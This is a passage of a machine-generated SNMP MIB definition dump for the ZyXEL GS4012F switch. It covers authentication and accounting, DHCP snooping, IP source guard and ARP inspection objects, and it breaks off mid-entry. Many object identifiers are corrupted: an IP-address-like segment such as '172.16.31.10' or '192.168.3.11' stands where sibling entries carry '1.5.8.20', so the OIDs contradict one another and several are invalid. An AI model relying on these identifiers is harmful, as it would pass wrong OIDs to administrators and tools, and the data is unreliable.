"authenticationTypeEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.45.1.1.1",
"status" : "current",
"linkage" : [
"authenticationTypeName",
],
"description" :
"""An entry in authenticationTypeTable.""",
}, # row
"authenticationTypeName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.45.1.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"authenticationTypeMethodList" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.45.1.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "OctetString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"accountingSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.45.2",
}, # node
"accountingUpdatePeriod" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.45.2.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"accountingTypeTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.45.2.2",
"status" : "current",
"description" :
"""""",
}, # table
"accountingTypeEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.45.2.2.1",
"status" : "current",
"linkage" : [
"accountingTypeName",
],
"description" :
"""An entry in accountingTypeTable.""",
}, # row
"accountingTypeName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.45.2.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"accountingTypeActive" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.45.2.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"accountingTypeBroadcast" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.45.2.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"accountingTypeMode" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.45.2.2.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"start-stop" : {
"nodetype" : "namednumber",
"number" : "1"
},
"stop-only" : {
"nodetype" : "namednumber",
"number" : "2"
},
"not-available" : {
"nodetype" : "namednumber",
"number" : "255"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"accountingTypeMethod" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.45.2.2.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"radius" : {
"nodetype" : "namednumber",
"number" : "1"
},
"tacacs" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"accountingTypePrivilege" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.45.2.2.1.6",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"privilege-0" : {
"nodetype" : "namednumber",
"number" : "0"
},
"privilege-1" : {
"nodetype" : "namednumber",
"number" : "1"
},
"privilege-2" : {
"nodetype" : "namednumber",
"number" : "2"
},
"privilege-3" : {
"nodetype" : "namednumber",
"number" : "3"
},
"privilege-4" : {
"nodetype" : "namednumber",
"number" : "4"
},
"privilege-5" : {
"nodetype" : "namednumber",
"number" : "5"
},
"privilege-6" : {
"nodetype" : "namednumber",
"number" : "6"
},
"privilege-7" : {
"nodetype" : "namednumber",
"number" : "7"
},
"privilege-8" : {
"nodetype" : "namednumber",
"number" : "8"
},
"privilege-9" : {
"nodetype" : "namednumber",
"number" : "9"
},
"privilege-10" : {
"nodetype" : "namednumber",
"number" : "10"
},
"privilege-11" : {
"nodetype" : "namednumber",
"number" : "11"
},
"privilege-12" : {
"nodetype" : "namednumber",
"number" : "12"
},
"privilege-13" : {
"nodetype" : "namednumber",
"number" : "13"
},
"privilege-14" : {
"nodetype" : "namednumber",
"number" : "14"
},
"not-available" : {
"nodetype" : "namednumber",
"number" : "255"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpSnp" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100",
}, # node
"dhcpSnpVlanTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100.1",
"status" : "current",
"description" :
"""""",
}, # table
"dhcpSnpVlanEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.1.1",
"status" : "current",
"linkage" : [
"dhcpSnpVlanEntryVid",
],
"description" :
"""""",
}, # row
"dhcpSnpVlanEntryVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.1.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "4094"
},
],
"range" : {
"min" : "1",
"max" : "4094"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpSnpVlanEntryEnable" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpSnpVlanEntryOption82Enable" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpSnpVlanEntryInfo" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpSnpPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100.2",
"status" : "current",
"description" :
"""""",
}, # table
"dhcpSnpPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.2.1",
"status" : "current",
"linkage" : [
"dhcpSnpPortEntryPort",
],
"description" :
"""""",
}, # row
"dhcpSnpPortEntryPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpSnpPortEntryTrust" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpSnpPortEntryRate" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.2.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "2048"
},
],
"range" : {
"min" : "0",
"max" : "2048"
},
},
},
"access" : "readwrite",
"description" :
"""0 means unlimited""",
}, # column
"dhcpSnpBindTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.3",
"status" : "current",
"description" :
"""""",
}, # table
"dhcpSnpBindEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100.3.1",
"status" : "current",
"linkage" : [
"dhcpSnpBindEntryMac",
"dhcpSnpBindEntryVid",
],
"description" :
"""""",
}, # row
"dhcpSnpBindEntryMac" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpSnpBindEntryVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100.3.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpSnpBindEntryIP" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpSnpBindEntryLease" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.3.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpSnpBindEntryType" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.3.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"dynamic" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpSnpBindEntryPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.3.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpSnpEnable" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"dhcpSnpDb" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100.5",
}, # node
"dhcpSnpDbAbort" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "65535"
},
],
"range" : {
"min" : "1",
"max" : "65535"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"dhcpSnpDbWriteDelay" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "65535"
},
],
"range" : {
"min" : "1",
"max" : "65535"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"dhcpSnpDbUrl" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"parent module" : {
"name" : "RFC1213-MIB",
"type" : "DisplayString",
},
"ranges" : [
{
"min" : "0",
"max" : "255"
},
],
"range" : {
"min" : "0",
"max" : "255"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"dhcpSnpDbUrlRenew" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"parent module" : {
"name" : "RFC1213-MIB",
"type" : "DisplayString",
},
"ranges" : [
{
"min" : "0",
"max" : "255"
},
],
"range" : {
"min" : "0",
"max" : "255"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStat" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100.5.5",
}, # node
"dhcpSnpDbStatClear" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatDelayExpiry" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatAbortExpiry" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatLastSuccTime" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatLastFailTime" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatLastFailReason" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatTotalAttempt" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatStartupFail" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100.5.5.9",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatSuccTrans" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.10",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatFailTrans" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100.5.5.11",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatSuccRead" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.12",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatFailRead" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100.5.5.13",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatSuccWrite" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.14",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatFailWrite" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.15",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDbStatLastIgnoreBindCol" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.17",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Last ignored: binding collision""",
}, # scalar
"dhcpSnpDbStatLastIgnoreExpireLease" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.18",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Last ignored: expired leases""",
}, # scalar
"dhcpSnpDbStatLastIgnoreInvalidIntf" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.19",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Last ignored: invalid interface""",
}, # scalar
"dhcpSnpDbStatLastIgnoreUnsuppVlan" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.192.168.3.11",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Last ignored: unsupported vlans""",
}, # scalar
"dhcpSnpDbStatLastIgnoreParse" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.21",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Last ignored: parsing error""",
}, # scalar
"dhcpSnpDbStatTotalIgnoreBindCol" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.22",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Total ignored: binding collision""",
}, # scalar
"dhcpSnpDbStatTotalIgnoreExpireLease" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.23",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Total ignored: expired leases""",
}, # scalar
"dhcpSnpDbStatTotalIgnoreInvalidIntf" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.24",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Total ignored: invalid interface""",
}, # scalar
"dhcpSnpDbStatTotalIgnoreUnsuppVlan" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.25",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Total ignored: unsupported vlans""",
}, # scalar
"dhcpSnpDbStatTotalIgnoreParse" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.26",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Total ignored: parsing error""",
}, # scalar
"dhcpSnpDbStatLastIgnoreTime" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.5.5.27",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpSnpDhcpVlan" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.6",
}, # node
"dhcpSnpDhcpVlanVid" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.6.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "4094"
},
],
"range" : {
"min" : "0",
"max" : "4094"
},
},
},
"access" : "readwrite",
"description" :
"""0: disable DHCP VLAN.""",
}, # scalar
"ipsg" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.101",
}, # node
"ipsgTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.101.1",
"status" : "current",
"description" :
"""""",
}, # table
"ipsgEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.101.1.1",
"create" : "true",
"status" : "current",
"linkage" : [
"ipsgEntryMac",
"ipsgEntryVid",
],
"description" :
"""""",
}, # row
"ipsgEntryMac" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.101.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ipsgEntryVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.101.1.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "4094"
},
],
"range" : {
"min" : "1",
"max" : "4094"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ipsgEntryIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.101.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"ipsgEntryLease" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.101.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""second""",
}, # column
"ipsgEntryType" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.101.1.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"static" : {
"nodetype" : "namednumber",
"number" : "1"
},
"dhcp" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ipsgEntryPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.101.1.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""0 means any port""",
}, # column
"ipsgEntryState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.101.1.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspect" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102",
}, # node
"arpInspectSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1",
}, # node
"arpInspectState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectFilterAgingTime" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "2147483647"
},
],
"range" : {
"min" : "0",
"max" : "2147483647"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectLog" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.3",
}, # node
"arpInspectLogEntries" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.3.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "1024"
},
],
"range" : {
"min" : "0",
"max" : "1024"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectLogRate" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.3.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "1024"
},
],
"range" : {
"min" : "0",
"max" : "1024"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectLogInterval" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.3.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "2147483647"
},
],
"range" : {
"min" : "0",
"max" : "2147483647"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectVlanTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.4",
"status" : "current",
"description" :
"""""",
}, # table
"arpInspectVlanEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.4.1",
"status" : "current",
"linkage" : [
"arpInspectVlanVid",
],
"description" :
"""""",
}, # row
"arpInspectVlanVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.102.1.4.1.1",
